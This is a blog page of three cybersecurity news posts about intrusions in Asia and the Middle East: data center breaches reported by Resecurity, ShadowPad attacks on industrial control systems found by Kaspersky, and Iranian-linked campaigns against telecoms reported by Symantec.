Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Asia. Show all posts

Data Centers Hacked to Collect Data from Multinational Firms

Over the past 18 months, there have been reports of cyberattacks against numerous data centers in various parts of the world, which have led to the leakage of information about some of the biggest corporations in the world and the publication of access privileges on the dark web.

Resecurity discovered several actors on the dark web, some of whom may have come from Asia, who were able to access customer records and exfiltrate them from one or more databases linked to particular apps and systems utilized by various data center firms during the campaign.

Initial access in at least one of the situations was probably obtained through a weak helpdesk or ticket management module which was connected with other programs and systems, allowing the threat actor to move laterally.

According to Resecurity, the threat actor was able to harvest credentials for data center IT personnel and clients, as well as a list of CCTV cameras and their corresponding video stream identifiers used to monitor data center settings.

Bloomberg said that two of the victim companies are GDS Holdings, based in Shanghai, and ST Telemedia Global Data Centres, based in Singapore. Resecurity did not identify the data center operators that were mentioned in the attack.

According to Bloomberg, GDS acknowledged that a customer assistance website was compromised in 2021 but insisted that there was no risk to the IT systems or data of its clients. It presented no risk to the clients, according to ST Telemedia.

According to Resecurity, businesses with a global presence in finance, investment funds, biomedical research firms, technology vendors, e-commerce sites, cloud services, ISPs, and content delivery network firms were among those whose information was exposed. According to the researchers, the companies are headquartered in the US, UK, Canada, Australia, Switzerland, New Zealand, and China.

Resecurity has not pinpointed any known APT groups as the perpetrators of the attacks. The experts point out that numerous, distinct perpetrators might compromise the victims.

Chinese Hackers Deploy Shadowpad Backdoor to Target Industrial Control Systems in Asia

 

ShadowPad, a sophisticated and modular backdoor is back in action. Russian cybersecurity firm Kaspersky has unearthed a series of assaults that targeted unpatched Microsoft Exchange servers in multiple Asian nations. 

Researchers initially spotted the ShadowPad backdoor on industrial control systems (ICS) at a telecoms firm in Pakistan, where the hackers targeted engineering computers in building automation systems. Further investigation uncovered wide activity on the network, along with multiple organizations targeted in Pakistan, Afghanistan, and Malaysia. 

"During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated building automation systems of one of the victims," Kaspersky ICS CERT researcher Kirill Kruglov stated. "By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization." 

"Building automation systems are rare targets for advanced threat actors. However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures." 

Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. However, traces of the attacks on compromised devices indicates that the malicious campaign began in March 2021, right around the time the ProxyLogon vulnerabilities in Exchange Servers became public knowledge. 

Besides deploying ShadowPad as "mscoree.dll," an authentic Microsoft .NET Framework component, the attacks also involved the use of Cobalt Strike, a PlugX variant called THOR, and web shells for remote access. Although the ultimate goal of the campaign remains unknown, the hackers are believed to be interested in long-term intelligence gathering. 

ShadowPad, which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been leveraged by multiple Chinese espionage actors over the years. While its design allows users to remotely deploy additional plugins that can extend its functionality beyond covert data collection, what makes ShadowPad dangerous is the anti-forensic and anti-analysis techniques incorporated into the malware. 

ShadowPad gained popularity in 2017 when it was employed in software supply chain assaults involving CCleaner, NetSarang, and the ASUS Live Update utility. The BRONZE ATLAS threat group was blamed for these campaigns. A Microsoft complaint from 2017 and DOJ indictments published in 2020 provide more insights on ShadowPad's relationship to BRONZE ATLAS.

Telecom Industries Targeted by Hackers in Middle East and Asia

 

According to analysts, criminals attacking telcos in the Middle East and Asia over the last six months have been connected to Iranian state-sponsored cybercriminals. Cyberespionage tactics use a potent combination of spear phishing, recognized malware, and genuine network tools to steal sensitive information and potentially disrupt supply chains. 

Analysts detailed their results in a study released on Tuesday, claiming that attacks are targeting a variety of IT services firms as well as utility companies. As per a report issued by Symantec Threat Hunter Team, a subsidiary of Broadcom, malicious actors seem to obtain access to networks via spear-phishing and then steal passwords to migrate laterally. 

“Organizations in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos were targeted in the campaign, which appears to have made no use of custom malware and instead relied on a mixture of legitimate tools, publicly available malware, and living-off-the-land tactics,” researchers wrote in the report. 

However the hackers' identities are unknown, analysts believe they may be associated with the Iranian organization Seedworm, also known as MuddyWater or TEMP.Zagros. In the past, this organization has conducted significant phishing efforts targeting enterprises in Asia and the Middle East to steal passwords and gain resilience in the target's networks. 

Researchers discovered two IP addresses used throughout the operation that had already been related to Seedworm activity, as well as some tool overlap, particularly SharpChisel and Password Dumper, they claimed. Whilst there has already been threat activity from Iran against telcos in the Middle East and Asia—for instance, the Iranian Chafer APT targeted a major Middle East telco in 2018—a Symantec spokesperson termed the action detailed in the report "a step up" in its focus as well as a prospective harbinger of larger attacks to come. 

According to the analysts, a conventional attack in the latest campaign started with attackers penetrating a specified network and then trying to steal passwords to move laterally so that web shells could be launched onto Exchange Servers. 

Researchers dissected a particular attack launched in August on a Middle Eastern telecom provider. According to the experts, the first sign of penetration, in that case, was the development of a service to execute an unidentified Windows Script File (WSF). 

Scripts were then utilized by attackers to execute different domain, user discovery, and remote service discovery commands, and PowerShell was ultimately utilized to download and execute files and scripts. According to analysts, attackers also used a remote access tool that purported to query Exchange Servers of other firms. 

According to the researchers, attackers were interested in leveraging some hacked firms as stepping stones or just to target organizations other than the first one to build a supply-chain attack. 

“A suspected ScreenConnect setup MSI appeared to have been delivered in a zipped file named ‘Special discount program.zip,’ suggesting that it arrived in a spear-phishing email,” they wrote.